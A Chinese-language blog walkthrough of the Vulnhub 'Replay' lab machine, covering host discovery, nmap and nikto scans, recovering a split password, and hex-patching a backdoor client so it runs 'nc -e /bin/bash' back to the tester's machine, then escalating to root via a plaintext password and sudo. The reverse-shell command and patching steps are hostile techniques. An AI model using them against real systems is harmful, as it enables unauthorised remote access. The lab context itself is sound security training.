首页 > 系统相关 >Vulnhub之Replay靶机详细测试过程(获得Root Shell)

Vulnhub之Replay靶机详细测试过程(获得Root Shell)

时间:2023-03-16 11:33:21浏览次数:47  
标签:bin Shell kali SF Replay root bob Root x20

Replay

作者: jason huawen

靶机信息

名称:Replay: 1

地址:

https://www.vulnhub.com/entry/replay-1,278/

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:c9:15:8b      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.102  08:00:27:a0:d5:27      1      60  PCS Systemtechnik GmbH         

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.102

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 21:30 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 54:35:aa:49:eb:90:09:a1:28:f3:0c:9a:fb:01:52:0d (RSA)
|   256 e7:0b:6e:52:00:51:74:11:b6:cd:c6:cf:25:3a:1b:84 (ECDSA)
|_  256 3b:38:da:d7:16:23:64:68:8f:52:12:8a:14:07:6a:53 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/bob_bd.zip
|_http-server-header: Apache/2.4.25 (Debian)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, FourOhFourRequest, GetRequest, Kerberos, LPDString, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: 
|     CH1:
|     Auth Failed Closing Connection... =-
|   DNSVersionBindReqTCP, HTTPOptions, SSLSessionReq, TLSSessionReq: 
|     CH1:
|     Auth Failed Closing Connection... =- 
|     Auth Failed Closing Connection... =-
|   GenericLines, NULL: 
|     CH1:
|   Help, RPCCheck: 
|     Auth Failed Closing Connection... =- 
|     CH1:
|_    Auth Failed Closing Connection... =-
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.92%I=7%D=3/15%Time=6412713A%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6,"\nCH1:\n")%r(GenericLines,6,"\nCH1:\n")%r(GetRequest,34,"\nCH1:\n
SF:\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n
SF:\n\n")%r(HTTPOptions,62,"\nCH1:\n\n\x20-=\x20Auth\x20Failed\x20Closing\
SF:x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\n\x20-=\x20Auth\x20Failed\x20Cl
SF:osing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(RTSPRequest,34,"\nCH1:\n\
SF:n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\
SF:n\n")%r(RPCCheck,62,"\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connect
SF:ion\.\.\.\x20=-\x20\n\n\n\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closin
SF:g\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(DNSVersionBindReqTCP,62,"\nCH
SF:1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x
SF:20\n\n\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20
SF:=-\x20\n\n\n")%r(DNSStatusRequestTCP,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20
SF:Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(Help,62,"\n\n
SF:\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n
SF:\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20
SF:=-\x20\n\n\n")%r(SSLSessionReq,62,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed
SF:\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\x20-=\x20Auth\x20Fa
SF:iled\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(TerminalServerC
SF:ookie,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection
SF:\.\.\.\x20=-\x20\n\n\n")%r(TLSSessionReq,62,"\nCH1:\n\n\x20-=\x20Auth\x
SF:20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n\n\n\n\x20-=\x20
SF:Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(Kerbe
SF:ros,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.
SF:\.\.\x20=-\x20\n\n\n")%r(SMBProgNeg,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20F
SF:ailed\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(X11Probe,34,"\
SF:nCH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=
SF:-\x20\n\n\n")%r(FourOhFourRequest,34,"\nCH1:\n\n\n\x20-=\x20Auth\x20Fai
SF:led\x20Closing\x20Connection\.\.\.\x20=-\x20\n\n\n")%r(LPDString,34,"\n
SF:CH1:\n\n\n\x20-=\x20Auth\x20Failed\x20Closing\x20Connection\.\.\.\x20=-
SF:\x20\n\n\n");
MAC Address: 08:00:27:A0:D5:27 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.14 seconds

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ telnet 192.168.56.102 1337 
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.

CH1:
hello
exit
^C
quit

zsh: terminated  telnet 192.168.56.102 1337

1337端口不清楚运行什么服务

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ curl http://192.168.56.102           
<!-- P1:qGQjwO4h6g  -->
<style>
body{
background-color: coral;
}
@font-face{
font-family: "cool";
src: url('/files/cool.ttf')
}
body{
font-family: cool;
}
.color_txt{
color:purple;
}
.color_title{
color:pink
}
</style>
<body>
<span class="color_title">
<h1>
<img src="/media/welcome.gif"></img>
Bob's Website
</h1>
</span>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gif"></img>
<img src="/media/bob.png"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gi"></img>
<img src="/media/palm.gif"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<img src="/media/palm.gf"></img>
<br>
<span class="color_txt">
<p>
This is my website that I made by myself. I have several years of experience managing and creating IT systems. If you are interested in hiring
me you can find <a href="/files/CV.odt"> my CV here.</a> If after reading my CV you are still interested in hiring me then you can contact me
on my email: [email protected]
</p>
</span>
<img src="/files/myITTeam.png"> </img>
</body>

访问80端口,返回内容有一句注释: P1:qGQjwO4h6g,是密码吗?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ nikto -h http://192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2023-03-15 21:38:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/bob_bd.zip' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 430, size: 57c5a1a9d26e8, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-03-15 21:39:03 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 92K
drwxr-xr-x  2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r--  1 kali kali  63K Mar 15 21:39 bob_bd.zip
-rw-r--r--  1 kali kali  13K Mar 15 21:35 CV.odt
-rw-r--r--  1 root root 4.0K Mar 15 21:33 nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ unzip bob_bd.zip 
Archive:  bob_bd.zip
  inflating: changelog.txt           
  inflating: client.bin              
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ls -alh
total 256K
drwxr-xr-x  2 kali kali 4.0K Mar 15 21:39 .
drwxr-xr-x 78 kali kali 4.0K Mar 15 21:28 ..
-rw-r--r--  1 kali kali  63K Mar 15 21:39 bob_bd.zip
-rwxr-xr-x  1 kali kali 1.2K Dec  6  2018 changelog.txt
-rwxr-xr-x  1 kali kali 158K Dec  6  2018 client.bin
-rw-r--r--  1 kali kali  13K Mar 15 21:35 CV.odt
-rw-r--r--  1 root root 4.0K Mar 15 21:33 nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ cat changelog.txt  
Changelog:

RG9uJ3QgZm9yZ2V0CgpQClMtPkItPkMtPkQtPlMKQy0+Qi0+UwpDLT5FLT5T

Next Update:
+ Add ASCII art
+ Fix bug where sometimes the backdoor fails to connect (fixed by reopening client.bin)
+ Add ablilty to be able to send more than hardcoded commands again (removed because of beefing up of security)


V4 [*clink* *clink* You will never be able to penetrate my defenses!]:
+ Backdoor will execute any command, too bad it only sends one hardcoded command :P (gonna have to add an input onto client)
+ Security beefed up bet no one can get through this, XOR and b64 is king

RW5kIG9mIGxvZw==

V3 [All wrapped up in a neat bow]:
+ Added a cool security challenge system to stop hackers
+ I am now compiling the python file into .bins
+ Added b64 system to improve security
Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==

V2 [The no go zone]:
+ Added b64 support
+ Added password check (validated by server)
RW5kIG9mIGxvZw==

V1 [And then there was light]:
+ I made a backdoor :D
+ Now I can access my server from anywhere without using ssh
RW5kIG9mIGxvZw==
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'RW5kIG9mIGxvZw==' | base64 -d                        
End of log                                                                                                                              

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ echo 'Ti5ULlMgQWRkZWQgMm5kIGhhbGYgb2YgcGFzc3dvcmQgaW50byB0aGUgYmFja2Rvb3Igc28gaWYgeW91IGZvcmdldCB0aGF0J3Mgd2hlcmUgaXQgaXMgZnVydHVyZSBtZS4gRW5kIG9mIGxvZw==' | base64 -d 
N.T.S Added 2nd half of password into the backdoor so if you forget that's where it is furture me. End of log    

执行client.bin发现需要输入密码。

 strings client.bin
home/c0rruptedb1t/MEGA/Projects And Operations/Project Replay/scripts/client.pydataIP: outputAF_INETEnter Password: sendmsgkeyencodexornotes00admincmd;echo Hello World, you are currently running as: ;whoamidecodestring--=======NOTES=======-- +Buy new milk (the current one is chunky) +2nd half of password is: h0TAIRNXuQcDu9Lqsyul +Find a new job +Call mom =====[END]=====commandlettersrecvoschoicesystem-= TERMINATING CONNNECTION =- 
client_socketrandominputstrclearraw_inputCommand to be executed: replacejointimebase64
?exit1230012300admincmd;SOCK_STREAMconnectsleepoutdataappendXORtmpAttempting to connect...(
Definitely the password I swear -> password123 <- Definitely the password I sweartypesbye<module>encodestringnumsHello there you're not being naughty are you? bob_pass123456789rblensumiterlongnameopenreadreprsitelevelrangeformatlocalsxrange__all____cmp____doc__compileglobalsinspect__dict____exit____file____iter____main____name____path__exc_typefromlist__class____enter__bytearrayexc_value__import____module____delattr____getattr____package____setattr__classmethod__builtins__staticmethod__metaclass__exc_traceback/usr/bin/python2
GCC: (Debian 8.2.0-6) 8.2.0

从中可知,密码的第二部分为:h0TAIRNXuQcDu9Lqsyul

可能前面网页源代码中的字符串为密码的第一部分qGQjwO4h6g

因此完整的密码为qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

运行client.bin

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ ./client.bin
./client.bin: error while loading shared libraries: libpython2.7.so.1.0: cannot open shared object file: No such file or directory
         

执行错误,缺少库文件,可以安装相应的库文件来解决:

─(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo apt install libpython2.7

echo Hello World, you are currently running as: ;whoamidecodestring--

似乎client.bin有硬编码,该代码执行whoami,是否可以用vim修改client.bin,从而得到Shell

  1. xxd client.bin client.bin.dump

  2. 用vim -b修改client.bin.dump,将echo Hello World, ....部分修改为echo Hello.... nc -e /bin/bash 192.168.56.146 5555, 注意要保持长度一致,修改十六进制数据即可(text部分无需修改),可以用cyberchef工具得到修改前的十六进制数据以及要修改的的十六进制数据。

  3. xxd -r client.bin.dump >client.bin

echo Hello World, you are currently running as: ;whoami

对应的十六进制数据为:

65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 2c 20 79 6f 75 20 61 72 65 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 61 73 3a 20 3b 77 68 6f 61 6d 69

修改为:

echo Hello Worldddd;nc -e /bin/bash 192.168.56.146 5555

对应的十六进制数据为:

65 63 68 6f 20 48 65 6c 6c 6f 20 57 6f 72 6c 64 64 64 64 3b 6e 63 20 2d 65 20 2f 62 69 6e 2f 62 61 73 68 20 31 39 32 2e 31 36 38 2e 35 36 2e 31 34 36 20 35 35 35 35

注意需要逐个字节进行修改,要保证修改前后长度一致

执行client.bin(修改后),得到shell

──(kali㉿kali)-[~/Desktop/Vulnhub/Replay]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.102] 58350
id
uid=1000(bob) gid=1000(bob) groups=1000(bob),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),115(lpadmin),119(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash: fortune: command not found
bash: cowsay: command not found
bash: lolcat: command not found
bob@replay:/root$ cd /home
cd /home
bob@replay:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Dec  6  2018 .
drwxr-xr-x 22 root root 4.0K Dec  6  2018 ..
drwxr-xr-x 19 bob  bob  4.0K Dec  6  2018 bob
bob@replay:/home$ cd bob
cd bob
bob@replay:~$ ls -alh
ls -alh

bob@replay:~/Documents$ cd .ftp
cd .ftp
bob@replay:~/Documents/.ftp$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob bob 4.0K Dec  6  2018 .
drwxr-xr-x 4 bob bob 4.0K Dec  6  2018 ..
-rw-r--r-- 1 bob bob   49 Dec  6  2018 users.passwd
bob@replay:~/Documents/.ftp$ cat users.passwd
cat users.passwd
bob:b0bcat_1234567890:1100:1100::/ftp:/bin/false
bob@replay:~/Documents/.ftp$ sudo -l
sudo -l
[sudo] password for bob: b0bcat_1234567890

Matching Defaults entries for bob on replay:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on replay:
    (ALL : ALL) ALL
bob@replay:~/Documents/.ftp$ sudo /bin/bash
sudo /bin/bash
root@replay:/home/bob/Documents/.ftp# cd /root
cd /root
root@replay:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Dec  6  2018 .
drwxr-xr-x 22 root root 4.0K Dec  6  2018 ..
-rw-------  1 root root 5.1K Dec  6  2018 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  2 root root 4.0K Dec  6  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Dec  6  2018 .selected_editor
root@replay:~# id 
id
uid=0(root) gid=0(root) groups=0(root)
root@replay:~# 

标签:bin,Shell,kali,SF,Replay,root,bob,Root,x20
From: https://www.cnblogs.com/jason-huawen/p/17221695.html

相关文章

  • Linux进入单用户模式:无密码登录root
    进入单用户模式可以做哪些操作:无密码登录root用户,可以修改密码(passwd),可以查看编辑文件等操作Linux进入单用户模式详细请看:https://www.cnblogs.com/sheepboy/p/17218500......
  • shell脚本 续签K8S证书 -续签至10年
    背景,适配kubeadm生成证书集群脚本主题main#!/usr/bin/envbashset-oerrexitset-opipefail#set-oxtrace#setoutputcolorNC='\033[0m'RED='\033[31m'......
  • shell 快捷键 超提高命令行,输入效率
    根据功能进行归类。光标移动命令说明Alt+b后移一个单词Alt+f前移一个单词Ctrl+b后移一个字符Ctrl+f前移一个字符Ctrl+a把光标移到行首Ctrl+e把......
  • 详解shell语法检查模式
    启用verbose调试模式在进入本指导的重点之前,让我们简要地探索下 verbose模式。它可以用-v调试选项来启用,它会告诉 shell 在读取时显示每行。要展示这个如何工作,下......
  • shell 9 -管理重任- 向用户终端发送消息
    1#!/bin/bash2set-x3USER=$14devices=`ls/dev/pts/*-l|awk'{print$3,$10}'|grep$USER|awk'{print$2}'`5fordevin$devices6do......
  • 修改linux shell 提示符
    远程登录虚拟机,linuxshell提示符为-bash-4.1$要把这个提示符改掉 1、新建~/.bash_profile文件-bash-4.1$vi~/.bash_profile-bash-4.1$cat ~/.bash_profilecat:......
  • 浅谈Linux下的shell--BASH
    shell的概念与作用我们已经学习并知道了操作系统实际上就是一款软件,一款用来管理计算机软硬件资源,为用户提供良好的执行环境的软件。假如该软件能被用户随意操作,就会有可能......
  • Linux开启root用户远程登录
    Linux开启root用户远程登录开启root账户,给root用户设置密码sudopasswdroot输入两遍密码修改配置文件打开SSH配置文件。vim/etc/ssh/sshd_config修改如下参......
  • GPU服务器无root权限conda初始化
    1.给anaconda文件写入权限sudochmoda+w.conda如果没有权限则会在创建环境时报以下错误NoWritableEnvsDirError:Nowriteableenvsdirectoriesconfigured.-......
  • Pixel4获取root及刷机
    0x01BL解锁windows平台需要装fastboot驱动https://developer.android.com/studio/run/win-usb下载驱动后,然后在设备管理界面,更新驱动,手动选择下载的驱动包位置#进入......